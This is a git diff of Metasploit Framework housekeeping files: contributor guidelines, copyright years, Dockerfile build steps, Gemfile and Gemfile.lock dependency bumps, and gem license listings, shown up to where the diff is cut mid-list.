+ 	- If you're reporting a bug, please be sure to include the expected behaviour, the observed behaviour, and steps to reproduce the problem. Resource scripts, console copy-pastes, and any background on the environment you encountered the bug in would be appreciated. More information can be found [below](#bug-reports).
+ - [Help fellow users with open issues]. This can require technical knowledge, but you can also get involved in conversations about bug reports and feature requests. This is a great way to get involved without getting too overwhelmed! 
+ - [Help fellow committers test recently submitted pull requests](https://github.com/rapid7/metasploit-framework/pulls). Again this can require some technical skill, but by pulling down a pull request and testing it, you can help ensure our new code contributions for stability and quality. 
+ - [Report a security vulnerability in Metasploit itself] to Rapid7. If you see something you think makes Metasploit vulnerable to an attack, let us know!  
+ - [Add module documentation](https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation). New documentation is always needed and cleaning up existing documents is just as important! If you're a non-native english speaker, you can help by replacing any ambiguous idioms, metaphors, or unclear language that might make our documentation hard to understand. 

-Here's a short list of do's and don'ts to make sure *your* valuable contributions actually make
-it into Metasploit's master branch.  If you do not care to follow these rules, your contribution
-**will** be closed. Sorry!

 ## Code Contributions
+For those of you who are looking to add code to Metasploit, your first step is to set up a [development environment]. Once that's done, we recommend beginners start by adding a [proof-of-concept exploit from ExploitDB,](https://www.exploit-db.com/search?verified=true&hasapp=true&nomsf=true) as a new module to the Metasploit framework. These exploits have been verified as recreatable and their ExploitDB page includes a copy of the exploitable software. This makes testing your module locally much simpler, and most importantly the exploits don't have an existing Metasploit implementation. ExploitDB can be slow to update however, so please double check that there isn't an existing module before beginning development! If you're certain the exploit you've chosen isn't already in Metasploit, read our [writing an exploit guide](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit). It will help you to get started and avoid some common mistakes.

-* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
+Once you have finished your new module and tested it locally to ensure it's working as expected, check out our [guide for accepting modules](https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements#module-additions). This will give you a good idea of how to clean up your code so that it's likely to get accepted.  
+
+Finally, follow our short list of do's and don'ts below to make sure your valuable contributions actually make it into Metasploit's master branch! We try to consider all our pull requests fairly and in detail, but if you do not follow these rules, your contribution
+will be closed. We need to ensure the code we're adding to master is written to a high standard.
+
+
+### Code Contribution Do's & Don'ts:
+--
+#### <u>Pull Requests</u>
+**Pull request [PR#9966] is a good example to follow.**
+
+* **Do** create a [topic branch] to work on instead of working directly on `master`. This helps to:
+	*  Protect the process.
+	* Ensures users are aware of commits on the branch being considered for merge.  
+	* Allows for a location for more commits to be offered without mingling with other contributor changes.
+	* Allows contributors to make progress while a PR is still being reviewed.
 * **Do** follow the [50/72 rule] for Git commit messages.
-* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
-* **Do** create a [topic branch] to work on instead of working directly on `master`.
-  This helps protect the process, ensures users are aware of commits on the branch being considered for merge,
-  allows for a location for more commits to be offered without mingling with other contributor changes,
-  and allows contributors to make progress while a PR is still being reviewed.
-
-
-### Pull Requests
-
 * **Do** write "WIP" on your PR and/or open a [draft PR] if submitting **working** yet unfinished code.
 * **Do** target your pull request to the **master branch**.
 * **Do** specify a descriptive title to make searching for your pull request easier.
-* **Do** include [console output], especially for witnessable effects in `msfconsole`.
+* **Do** include [console output], especially for effects that can be witnessed in the  `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description.
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.
+* **Don't** post questions in older closed PRs.

-Pull request [PR#9966] is a good example to follow.
-
-#### New Modules
-
+#### <u>New Modules</u>
+* **Do** license your code as BSD 3-clause, BSD 2-clause, or MIT.
+* **Do** stick to the [Ruby style guide] and use [Rubocop] to find common style issues.
 * **Do** set up `msftidy` to fix any errors or warnings that come up as a [pre-commit hook].
 * **Do** use the many module mixin [API]s.
-* **Don't** include more than one module per pull request.
 * **Do** include instructions on how to setup the vulnerable environment or software.
 * **Do** include [Module Documentation] showing sample run-throughs.
-* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and
-  anything "serious" can be done with post modules and local exploits.
-
-#### Library Code
+* **Don't** include more than one module per pull request.
+* **Don't** submit new [scripts].  Scripts are shipped as examples for automating local tasks, and anything "serious" can be done with post modules and local exploits.

+#### <u>Library Code</u>
 * **Do** write [RSpec] tests - even the smallest change in a library can break existing code.
 * **Do** follow [Better Specs] - it's like the style guide for specs.
 * **Do** write [YARD] documentation - this makes it easier for people to use your code.
 * **Don't** fix a lot of things in one pull request. Small fixes are easier to validate.

-#### Bug Fixes
-
+#### <u>Bug Fixes</u>
 * **Do** include reproduction steps in the form of verification steps.
 * **Do** link to any corresponding [Issues] in the format of `See #1234` in your commit description.

@@ -69,6 +72,7 @@ When reporting Metasploit issues:
 * **Do** write a detailed description of your bug and use a descriptive title.
 * **Do** include reproduction steps, stack traces, and anything that might help us fix your bug.
 * **Don't** file duplicate reports; search for your bug before filing a new report.
+* **Don't** attempt to report issues on a closed PR.

 If you need some more guidance, talk to the main body of open source contributors over on our
 [Metasploit Slack] or [#metasploit on Freenode IRC].
@@ -97,8 +101,8 @@ curve, so keep it up!
 [Module Documentation]:https://github.com/rapid7/metasploit-framework/wiki/Generating-Module-Documentation
 [scripts]:https://github.com/rapid7/metasploit-framework/tree/master/scripts
 [RSpec]:http://rspec.info
-[Better Specs]:http://betterspecs.org
+[Better Specs]:http://www.betterspecs.org/
 [YARD]:http://yardoc.org
 [Issues]:https://github.com/rapid7/metasploit-framework/issues
 [Metasploit Slack]:https://www.metasploit.com/slack
-[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
+[#metasploit on Freenode IRC]:http://webchat.freenode.net/?channels=%23metasploit&uio=d4
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -1,4 +1,4 @@
-FROM ruby:2.6.2-alpine3.9 AS builder
+FROM ruby:2.6.6-alpine3.10 AS builder
 LABEL maintainer="Rapid7"

 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage"
@@ -27,16 +27,16 @@ RUN apk add --no-cache \
      zlib-dev \
      ncurses-dev \
      git \
-    && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
-    && gem update --system \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && echo "gem: --no-document" > /etc/gemrc \
+    && gem update --system 3.0.6 \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
    && chmod -R a+r /usr/local/bundle


-FROM ruby:2.6.2-alpine3.9
+FROM ruby:2.6.5-alpine3.10
 LABEL maintainer="Rapid7"

 ENV APP_HOME=/usr/src/metasploit-framework
@@ -51,8 +51,11 @@ RUN apk add --no-cache bash sqlite-libs nmap nmap-scripts nmap-nselibs postgresq
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby)
 RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which nmap)

-COPY --chown=root:metasploit --from=builder /usr/local/bundle /usr/local/bundle
-COPY --chown=root:metasploit . $APP_HOME/
+COPY --from=builder /usr/local/bundle /usr/local/bundle
+RUN chown -R root:metasploit /usr/local/bundle
+COPY . $APP_HOME/
+RUN chown -R root:metasploit $APP_HOME/
+RUN chmod 664 $APP_HOME/Gemfile.lock
 RUN cp -f $APP_HOME/docker/database.yml $APP_HOME/config/database.yml

 WORKDIR $APP_HOME
@@ -8,7 +8,7 @@ gem 'sqlite3', '~>1.3.0'
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
  # code coverage for tests
-  gem 'simplecov'
+  gem 'simplecov', '0.18.2'
 end

 group :development do
@@ -17,9 +17,13 @@ group :development do
  # generating documentation
  gem 'yard'
  # for development and testing purposes
-  gem 'pry'
+  gem 'pry-byebug'
  # module documentation
  gem 'octokit'
+  # memory profiling
+  gem 'memory_profiler'
+  # cpu profiling
+  gem 'ruby-prof'
  # Metasploit::Aggregator external session proxy
  # disabled during 2.5 transition until aggregator is available
  #gem 'metasploit-aggregator'
@@ -36,6 +40,7 @@ group :development, :test do
  # environment is development
  gem 'rspec-rails'
  gem 'rspec-rerun'
+  gem 'rubocop'
  gem 'swagger-blocks'
 end

@@ -1,35 +1,41 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.34)
-      actionpack (~> 4.2.6)
-      activerecord (~> 4.2.6)
-      activesupport (~> 4.2.6)
+    metasploit-framework (6.0.3)
+      actionpack (~> 5.2.2)
+      activerecord (~> 5.2.2)
+      activesupport (~> 5.2.2)
      aws-sdk-ec2
      aws-sdk-iam
      aws-sdk-s3
-      backports
      bcrypt
      bcrypt_pbkdf
      bit-struct
+      bson
      concurrent-ruby (= 1.0.5)
      dnsruby
      ed25519
      em-http-request
+      eventmachine
      faker
+      faraday
+      faye-websocket
      filesize
+      hrr_rb_ssh (= 0.3.0.pre2)
+      irb
      jsobfu
      json
      metasm
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 1.3.70)
-      metasploit_data_models (= 3.0.10)
-      metasploit_payloads-mettle (= 0.5.16)
+      metasploit-payloads (= 2.0.10)
+      metasploit_data_models
+      metasploit_payloads-mettle (= 1.0.2)
      mqtt
      msgpack
      nessus_rest
+      net-ldap
      net-ssh
      network_interface
      nexpose
@@ -41,7 +47,7 @@ PATH
      patch_finder
      pcaprub
      pdf-reader
-      pg (~> 0.20)
+      pg
      railties
      rb-readline
      recog
@@ -65,7 +71,7 @@ PATH
      rex-text
      rex-zip
      ruby-macho
-      ruby_smb
+      ruby_smb (~> 2.0)
      rubyntlm
      rubyzip
      sinatra
@@ -83,76 +89,77 @@ GEM
  remote: https://rubygems.org/
  specs:
    Ascii85 (1.0.3)
-    actionpack (4.2.11.1)
-      actionview (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
-      rack (~> 1.6)
-      rack-test (~> 0.6.2)
-      rails-dom-testing (~> 1.0, >= 1.0.5)
+    actionpack (5.2.4.3)
+      actionview (= 5.2.4.3)
+      activesupport (= 5.2.4.3)
+      rack (~> 2.0, >= 2.0.8)
+      rack-test (>= 0.6.3)
+      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.11.1)
-      activesupport (= 4.2.11.1)
+    actionview (5.2.4.3)
+      activesupport (= 5.2.4.3)
      builder (~> 3.1)
-      erubis (~> 2.7.0)
-      rails-dom-testing (~> 1.0, >= 1.0.5)
+      erubi (~> 1.4)
+      rails-dom-testing (~> 2.0)
      rails-html-sanitizer (~> 1.0, >= 1.0.3)
-    activemodel (4.2.11.1)
-      activesupport (= 4.2.11.1)
-      builder (~> 3.1)
-    activerecord (4.2.11.1)
-      activemodel (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
-      arel (~> 6.0)
-    activesupport (4.2.11.1)
-      i18n (~> 0.7)
+    activemodel (5.2.4.3)
+      activesupport (= 5.2.4.3)
+    activerecord (5.2.4.3)
+      activemodel (= 5.2.4.3)
+      activesupport (= 5.2.4.3)
+      arel (>= 9.0)
+    activesupport (5.2.4.3)
+      concurrent-ruby (~> 1.0, >= 1.0.2)
+      i18n (>= 0.7, < 2)
      minitest (~> 5.1)
-      thread_safe (~> 0.3, >= 0.3.4)
      tzinfo (~> 1.1)
-    addressable (2.6.0)
-      public_suffix (>= 2.0.2, < 4.0)
+    addressable (2.7.0)
+      public_suffix (>= 2.0.2, < 5.0)
    afm (0.2.2)
-    arel (6.0.4)
-    arel-helpers (2.9.1)
+    arel (9.0.0)
+    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
-    aws-eventstream (1.0.3)
-    aws-partitions (1.180.0)
-    aws-sdk-core (3.56.0)
-      aws-eventstream (~> 1.0, >= 1.0.2)
-      aws-partitions (~> 1.0)
+    ast (2.4.1)
+    aws-eventstream (1.1.0)
+    aws-partitions (1.358.0)
+    aws-sdk-core (3.104.4)
+      aws-eventstream (~> 1, >= 1.0.2)
+      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.96.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-ec2 (1.188.0)
+      aws-sdk-core (~> 3, >= 3.99.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.26.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-iam (1.43.0)
+      aws-sdk-core (~> 3, >= 3.99.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-kms (1.22.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-kms (1.36.0)
+      aws-sdk-core (~> 3, >= 3.99.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-s3 (1.43.0)
-      aws-sdk-core (~> 3, >= 3.56.0)
+    aws-sdk-s3 (1.78.0)
+      aws-sdk-core (~> 3, >= 3.104.3)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.1.0)
-      aws-eventstream (~> 1.0, >= 1.0.2)
-    backports (3.15.0)
-    bcrypt (3.1.13)
+    aws-sigv4 (1.2.2)
+      aws-eventstream (~> 1, >= 1.0.2)
+    bcrypt (3.1.15)
    bcrypt_pbkdf (1.0.1)
-    bindata (2.4.4)
+    bindata (2.4.8)
    bit-struct (0.16)
-    builder (3.2.3)
-    coderay (1.1.2)
+    bson (4.10.0)
+    builder (3.2.4)
+    byebug (11.1.3)
+    coderay (1.1.3)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
-    crass (1.0.4)
+    crass (1.0.6)
    daemons (1.3.1)
-    diff-lcs (1.3)
-    dnsruby (1.61.2)
-      addressable (~> 2.5)
+    diff-lcs (1.4.4)
+    dnsruby (1.61.4)
+      simpleidn (~> 0.1)
    docile (1.3.2)
    ed25519 (1.2.4)
-    em-http-request (1.1.5)
+    em-http-request (1.1.6)
      addressable (>= 2.3.4)
      cookiejar (!= 0.3.1)
      em-socksify (>= 0.3)
@@ -160,42 +167,45 @@ GEM
      http_parser.rb (>= 0.6.0)
    em-socksify (0.3.2)
      eventmachine (>= 1.0.0.beta.4)
-    equatable (0.6.1)
-    erubis (2.7.0)
+    erubi (1.9.0)
    eventmachine (1.2.7)
-    factory_bot (5.0.2)
-      activesupport (>= 4.2.0)
-    factory_bot_rails (5.0.2)
-      factory_bot (~> 5.0.2)
-      railties (>= 4.2.0)
-    faker (1.9.4)
-      i18n (>= 0.7)
-      pastel (~> 0.7.2)
-      thor (~> 0.20.0)
-      tty-pager (~> 0.12.0)
-      tty-screen (~> 0.6.5)
-      tty-tree (~> 0.3.0)
-    faraday (0.15.4)
+    factory_bot (6.1.0)
+      activesupport (>= 5.0.0)
+    factory_bot_rails (6.1.0)
+      factory_bot (~> 6.1.0)
+      railties (>= 5.0.0)
+    faker (2.13.0)
+      i18n (>= 1.6, < 2)
+    faraday (1.0.1)
      multipart-post (>= 1.2, < 3)
+    faye-websocket (0.11.0)
+      eventmachine (>= 0.12.0)
+      websocket-driver (>= 0.5.1)
    filesize (0.2.0)
    fivemat (1.3.7)
    hashery (2.1.2)
+    hrr_rb_ssh (0.3.0.pre2)
+      ed25519 (~> 1.2)
    http_parser.rb (0.6.0)
-    i18n (0.9.5)
+    i18n (1.8.5)
      concurrent-ruby (~> 1.0)
+    io-console (0.5.6)
+    irb (1.2.4)
+      reline (>= 0.0.1)
    jmespath (1.4.0)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.2.0)
-    loofah (2.2.3)
+    json (2.3.1)
+    loofah (2.6.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.5.9)
+    memory_profiler (0.9.14)
    metasm (1.0.4)
-    metasploit-concern (2.0.5)
-      activemodel (~> 4.2.6)
-      activesupport (~> 4.2.6)
-      railties (~> 4.2.6)
-    metasploit-credential (3.0.3)
+    metasploit-concern (3.0.0)
+      activemodel (~> 5.2.2)
+      activesupport (~> 5.2.2)
+      railties (~> 5.2.2)
+    metasploit-credential (4.0.2)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 3.0.0)
@@ -205,84 +215,88 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (2.0.4)
-      activemodel (~> 4.2.6)
-      activesupport (~> 4.2.6)
-      railties (~> 4.2.6)
-    metasploit-payloads (1.3.70)
-    metasploit_data_models (3.0.10)
-      activerecord (~> 4.2.6)
-      activesupport (~> 4.2.6)
+    metasploit-model (3.0.0)
+      activemodel (~> 5.2.2)
+      activesupport (~> 5.2.2)
+      railties (~> 5.2.2)
+    metasploit-payloads (2.0.10)
+    metasploit_data_models (4.0.2)
+      activerecord (~> 5.2.2)
+      activesupport (~> 5.2.2)
      arel-helpers
      metasploit-concern
      metasploit-model
      pg
-      postgres_ext
-      railties (~> 4.2.6)
+      railties (~> 5.2.2)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.5.16)
-    method_source (0.9.2)
+    metasploit_payloads-mettle (1.0.2)
+    method_source (1.0.0)
    mini_portile2 (2.4.0)
-    minitest (5.11.3)
+    minitest (5.14.1)
    mqtt (0.5.0)
-    msgpack (1.3.0)
+    msgpack (1.3.3)
    multipart-post (2.1.1)
+    mustermann (1.1.1)
+      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ssh (5.2.0)
+    net-ldap (0.16.3)
+    net-ssh (6.1.0)
    network_interface (0.0.2)
    nexpose (7.2.1)
-    nokogiri (1.10.3)
+    nokogiri (1.10.10)
      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.18.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
+    openssl-cmac (2.0.1)
    openvas-omp (0.0.4)
    packetfu (1.1.13)
      pcaprub
-    pastel (0.7.3)
-      equatable (~> 0.6)
-      tty-color (~> 0.5)
+    parallel (1.19.2)
+    parser (2.7.1.4)
+      ast (~> 2.4.1)
    patch_finder (1.0.2)
    pcaprub (0.13.0)
-    pdf-reader (2.2.0)
+    pdf-reader (2.4.0)
      Ascii85 (~> 1.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
      ttfunk
-    pg (0.21.0)
-    pg_array_parser (0.0.9)
-    postgres_ext (3.0.1)
-      activerecord (~> 4.0)
-      arel (>= 4.0.1)
-      pg_array_parser (~> 0.0.9)
-    pry (0.12.2)
-      coderay (~> 1.1.0)
-      method_source (~> 0.9.0)
-    public_suffix (3.1.1)
-    rack (1.6.11)
-    rack-protection (1.5.5)
+    pg (1.2.3)
+    pry (0.13.1)
+      coderay (~> 1.1)
+      method_source (~> 1.0)
+    pry-byebug (3.9.0)
+      byebug (~> 11.0)
+      pry (~> 0.13.0)
+    public_suffix (4.0.5)
+    rack (2.2.3)
+    rack-protection (2.0.8.1)
      rack
-    rack-test (0.6.3)
-      rack (>= 1.0)
-    rails-deprecated_sanitizer (1.0.3)
-      activesupport (>= 4.2.0.alpha)
-    rails-dom-testing (1.0.9)
-      activesupport (>= 4.2.0, < 5.0)
-      nokogiri (~> 1.6)
-      rails-deprecated_sanitizer (>= 1.0.1)
-    rails-html-sanitizer (1.0.4)
-      loofah (~> 2.2, >= 2.2.2)
-    railties (4.2.11.1)
-      actionpack (= 4.2.11.1)
-      activesupport (= 4.2.11.1)
+    rack-test (1.1.0)
+      rack (>= 1.0, < 3)
+    rails-dom-testing (2.0.3)
+      activesupport (>= 4.2.0)
+      nokogiri (>= 1.6)
+    rails-html-sanitizer (1.3.0)
+      loofah (~> 2.3)
+    railties (5.2.4.3)
+      actionpack (= 5.2.4.3)
+      activesupport (= 5.2.4.3)
+      method_source
      rake (>= 0.8.7)
-      thor (>= 0.18.1, < 2.0)
-    rake (12.3.2)
+      thor (>= 0.19.0, < 2.0)
+    rainbow (3.0.0)
+    rake (13.0.1)
    rb-readline (0.5.5)
-    recog (2.3.2)
+    recog (2.3.14)
      nokogiri
-    redcarpet (3.4.0)
+    redcarpet (3.5.0)
+    regexp_parser (1.7.1)
+    reline (0.1.4)
+      io-console (~> 0.5)
    rex-arch (0.1.13)
      rex-text
    rex-bin_tools (0.1.6)
@@ -296,7 +310,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.24)
      jsobfu
      metasm
      rex-arch
@@ -309,9 +323,10 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.82)
+    rex-powershell (0.1.87)
      rex-random_identifier
      rex-text
+      ruby-rc4
    rex-random_identifier (0.1.4)
      rex-text
    rex-registry (0.1.3)
@@ -319,99 +334,110 @@ GEM
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.18)
+    rex-socket (0.1.23)
      rex-core
    rex-sslscan (0.1.5)
      rex-core
      rex-socket
      rex-text
    rex-struct2 (0.1.2)
-    rex-text (0.2.21)
+    rex-text (0.2.28)
    rex-zip (0.1.3)
      rex-text
+    rexml (3.2.4)
    rkelly-remix (0.0.7)
-    rspec (3.8.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-    rspec-core (3.8.1)
-      rspec-support (~> 3.8.0)
-    rspec-expectations (3.8.4)
+    rspec (3.9.0)
+      rspec-core (~> 3.9.0)
+      rspec-expectations (~> 3.9.0)
+      rspec-mocks (~> 3.9.0)
+    rspec-core (3.9.2)
+      rspec-support (~> 3.9.3)
+    rspec-expectations (3.9.2)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-mocks (3.8.1)
+      rspec-support (~> 3.9.0)
+    rspec-mocks (3.9.1)
      diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.8.0)
-    rspec-rails (3.8.2)
-      actionpack (>= 3.0)
-      activesupport (>= 3.0)
-      railties (>= 3.0)
-      rspec-core (~> 3.8.0)
-      rspec-expectations (~> 3.8.0)
-      rspec-mocks (~> 3.8.0)
-      rspec-support (~> 3.8.0)
+      rspec-support (~> 3.9.0)
+    rspec-rails (4.0.1)
+      actionpack (>= 4.2)
+      activesupport (>= 4.2)
+      railties (>= 4.2)
+      rspec-core (~> 3.9)
+      rspec-expectations (~> 3.9)
+      rspec-mocks (~> 3.9)
+      rspec-support (~> 3.9)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.8.2)
+    rspec-support (3.9.3)
+    rubocop (0.89.1)
+      parallel (~> 1.10)
+      parser (>= 2.7.1.1)
+      rainbow (>= 2.2.2, < 4.0)
+      regexp_parser (>= 1.7)
+      rexml
+      rubocop-ast (>= 0.3.0, < 1.0)
+      ruby-progressbar (~> 1.7)
+      unicode-display_width (>= 1.4.0, < 2.0)
+    rubocop-ast (0.3.0)
+      parser (>= 2.7.1.4)
    ruby-macho (2.2.0)
+    ruby-prof (1.4.1)
+    ruby-progressbar (1.10.1)
    ruby-rc4 (0.1.5)
-    ruby_smb (1.1.0)
+    ruby2_keywords (0.0.2)
+    ruby_smb (2.0.3)
      bindata
+      openssl-ccm
+      openssl-cmac
      rubyntlm
      windows_error
    rubyntlm (0.6.2)
-    rubyzip (1.2.3)
+    rubyzip (2.3.0)
    sawyer (0.8.2)
      addressable (>= 2.3.5)
      faraday (> 0.8, < 2.0)
-    simplecov (0.16.1)
+    simplecov (0.18.2)
      docile (~> 1.1)
-      json (>= 1.8, < 3)
-      simplecov-html (~> 0.10.0)
-    simplecov-html (0.10.2)
-    sinatra (1.4.8)
-      rack (~> 1.5)
-      rack-protection (~> 1.4)
-      tilt (>= 1.3, < 3)
+      simplecov-html (~> 0.11)
+    simplecov-html (0.12.2)
+    simpleidn (0.1.1)
+      unf (~> 0.1.4)
+    sinatra (2.0.8.1)
+      mustermann (~> 1.0)
+      rack (~> 2.0)
+      rack-protection (= 2.0.8.1)
+      tilt (~> 2.0)
    sqlite3 (1.3.13)
    sshkey (2.0.0)
-    strings (0.1.5)
-      strings-ansi (~> 0.1)
-      unicode-display_width (~> 1.5)
-      unicode_utils (~> 1.4)
-    strings-ansi (0.1.0)
-    swagger-blocks (2.0.2)
+    swagger-blocks (3.0.0)
    thin (1.7.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
-    thor (0.20.3)
+    thor (1.0.1)
    thread_safe (0.3.6)
-    tilt (2.0.9)
+    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.5.1)
-    tty-color (0.5.0)
-    tty-pager (0.12.1)
-      strings (~> 0.1.4)
-      tty-screen (~> 0.6)
-      tty-which (~> 0.4)
-    tty-screen (0.6.5)
-    tty-tree (0.3.0)
-    tty-which (0.4.1)
-    tzinfo (1.2.5)
+    ttfunk (1.6.2.1)
+    tzinfo (1.2.7)
      thread_safe (~> 0.1)
-    tzinfo-data (1.2019.1)
+    tzinfo-data (1.2020.1)
      tzinfo (>= 1.0.0)
-    unicode-display_width (1.6.0)
-    unicode_utils (1.4.0)
-    warden (1.2.7)
-      rack (>= 1.0)
+    unf (0.1.4)
+      unf_ext
+    unf_ext (0.0.7.7)
+    unicode-display_width (1.7.0)
+    warden (1.2.8)
+      rack (>= 2.0.6)
+    websocket-driver (0.7.3)
+      websocket-extensions (>= 0.1.0)
+    websocket-extensions (0.1.5)
    windows_error (0.1.2)
-    xdr (2.0.0)
-      activemodel (>= 4.2.7)
-      activesupport (>= 4.2.7)
+    xdr (3.0.1)
+      activemodel (>= 5.2.0)
+      activesupport (>= 5.2.0)
    xmlrpc (0.3.0)
-    yard (0.9.19)
+    yard (0.9.25)

 PLATFORMS
  ruby
@@ -419,14 +445,17 @@ PLATFORMS
 DEPENDENCIES
  factory_bot_rails
  fivemat
+  memory_profiler
  metasploit-framework!
  octokit
-  pry
+  pry-byebug
  rake
  redcarpet
  rspec-rails
  rspec-rerun
-  simplecov
+  rubocop
+  ruby-prof
+  simplecov (= 0.18.2)
  sqlite3 (~> 1.3.0)
  swagger-blocks
  timecop
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -71,6 +71,10 @@ Files: lib/anemone.rb lib/anemone/*
 Copyright: 2009 Vertive, Inc.
 License: MIT

+Files: lib/expect.rb
+Copyright: 2017 Yukihiro Matsumoto
+License: Ruby
+
 Files: lib/msf/core/modules/external/python/async_timeout/*
 Copyright: 2016-2017 Andrew Svetlov
 License: Apache 2.0
@@ -1,156 +1,170 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
 Ascii85, 1.0.3, MIT
-actionpack, 4.2.11.1, MIT
-actionview, 4.2.11.1, MIT
-activemodel, 4.2.11.1, MIT
-activerecord, 4.2.11.1, MIT
-activesupport, 4.2.11.1, MIT
-addressable, 2.6.0, "Apache 2.0"
+actionpack, 5.2.4.3, MIT
+actionview, 5.2.4.3, MIT
+activemodel, 5.2.4.3, MIT
+activerecord, 5.2.4.3, MIT
+activesupport, 5.2.4.3, MIT
+addressable, 2.7.0, "Apache 2.0"
 afm, 0.2.2, MIT
-arel, 6.0.4, MIT
-arel-helpers, 2.9.1, MIT
-aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.180.0, "Apache 2.0"
-aws-sdk-core, 3.56.0, "Apache 2.0"
-aws-sdk-ec2, 1.96.0, "Apache 2.0"
-aws-sdk-iam, 1.26.0, "Apache 2.0"
-aws-sdk-kms, 1.22.0, "Apache 2.0"
-aws-sdk-s3, 1.43.0, "Apache 2.0"
-aws-sigv4, 1.1.0, "Apache 2.0"
-backports, 3.15.0, MIT
-bcrypt, 3.1.13, MIT
+arel, 9.0.0, MIT
+arel-helpers, 2.11.0, MIT
+ast, 2.4.1, MIT
+aws-eventstream, 1.1.0, "Apache 2.0"
+aws-partitions, 1.358.0, "Apache 2.0"
+aws-sdk-core, 3.104.4, "Apache 2.0"
+aws-sdk-ec2, 1.188.0, "Apache 2.0"
+aws-sdk-iam, 1.43.0, "Apache 2.0"
+aws-sdk-kms, 1.36.0, "Apache 2.0"
+aws-sdk-s3, 1.78.0, "Apache 2.0"
+aws-sigv4, 1.2.2, "Apache 2.0"
+bcrypt, 3.1.15, MIT
 bcrypt_pbkdf, 1.0.1, MIT
-bindata, 2.4.4, ruby
+bindata, 2.4.8, ruby
 bit-struct, 0.16, ruby
-builder, 3.2.3, MIT
+bson, 4.10.0, "Apache 2.0"
+builder, 3.2.4, MIT
 bundler, 1.17.3, MIT
-coderay, 1.1.2, MIT
+byebug, 11.1.3, "Simplified BSD"
+coderay, 1.1.3, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.4, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
-diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
-dnsruby, 1.61.2, "Apache 2.0"
+diff-lcs, 1.4.4, "MIT, Artistic-2.0, GPL-2.0+"
+dnsruby, 1.61.4, "Apache 2.0"
 docile, 1.3.2, MIT
 ed25519, 1.2.4, MIT
-em-http-request, 1.1.5, MIT
+em-http-request, 1.1.6, MIT
 em-socksify, 0.3.2, MIT
-equatable, 0.6.1, MIT
